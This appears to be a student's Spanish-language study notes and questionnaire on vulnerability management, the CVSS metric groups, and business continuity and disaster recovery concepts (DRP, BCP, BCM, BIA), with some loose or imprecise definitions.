Cuestionario
1. Que es Gestion vulnerabilidad?
Las pruebas de vulnerabilidad manuales, automatizadas o la combinación de ambas, requieren de personal y
consultores con un conocimiento amplio de seguridad y un alto nivel de confiabilidad
2. Describa los tres grupos de metricas que establece CVVS
 • Grupo de métricas base
Representan las características intrincadas a la vulnerabilidad que son constantes en el tiempo, definen como se
puede hacer una vulnerabilidad y se cumplen las condiciones para ser explotadas.
• Grupo de métricas temporales
Esta representa las características de una vulnerabilidad que pueden cambiar en el tiempo, pero son constantes en
el ambiente de un usuario.
• Grupo de métricas de entorno
Representa las características de una vulnerabilidad que son relevantes y únicas para el entorno del usuario en
particular, se enfoca a las características del entorno del usuario son opcionales el cual es utilizado cuando el
usuario considera que la métrica no existe.

Video Continuidad del negocio, recuperación de desastres

Resumen
Las empresas que sobreviven a un desastre y pueden recuperarse con la información y los servicios necesarios
son aquellos que planifican que este tipo de eventos podrían ocurrir, su preparación para el peor de los casos,
hicieron una estimación de los posibles danos e implementaron los controles necesarios para su protección.
Elementos
DPR disaster recovery plan
Se lleva a cabo cuando todo esta en modo de emergencia
Disaster recovery
La recuperación de desastres es reducir al mínimo los desastres
BCP
Es fundamental, puede preparar los sistemas críticos para que opere en otros ambientes, ayuda a preparar a las
personas en el momento indicado, mientras las condiciones regresan.
BCM
Este proporciona un marco de trabajo para las capacidades de recuperación, es permitir que continúe las
operaciones
BIA
Consiste en analizar todas las amenazas que nosotros podamos tener presentes, todas las que se puedan
materializar en nuestro entorno, un desastre natural. Político, guerra etc., y pensar cómo vamos a protegernos,
que se entiendas las amenazas son reales.
Preguntas de análisis
¿Qué tan grave es?
¿Cuánto va a doler?
¿Cuándo va a costar?
Bia, análisis funcional. Se recolectan datos a través de entrevistas documentos, análisis de funciones de negocio,
etc.
Opinión

La planificación de la recuperación de desastres puede ser desarrollada dentro de una organización o se puede
comprar una aplicación de software o un servicio.
Cuestionario
Describa los planes de recuperación de desastres
1. DPR disaster recovery plan
Se lleva a cabo cuando todo esta en modo de emergencia
2. Disaster recovery
La recuperación de desastres es reducir al mínimo los desastres
3. BCP
Es fundamental, puede preparar los sistemas críticos para que opere en otros ambientes, ayuda a preparar a
las personas en el momento indicado, mientras las condiciones regresan.
4. BCM
Este proporciona un marco de trabajo para las capacidades de recuperación, es permitir que continúe las
operaciones

5. BIA
Bia, análisis funcional. Se recolectan datos a través de entrevistas documentos, análisis de funciones de negocio,
etc.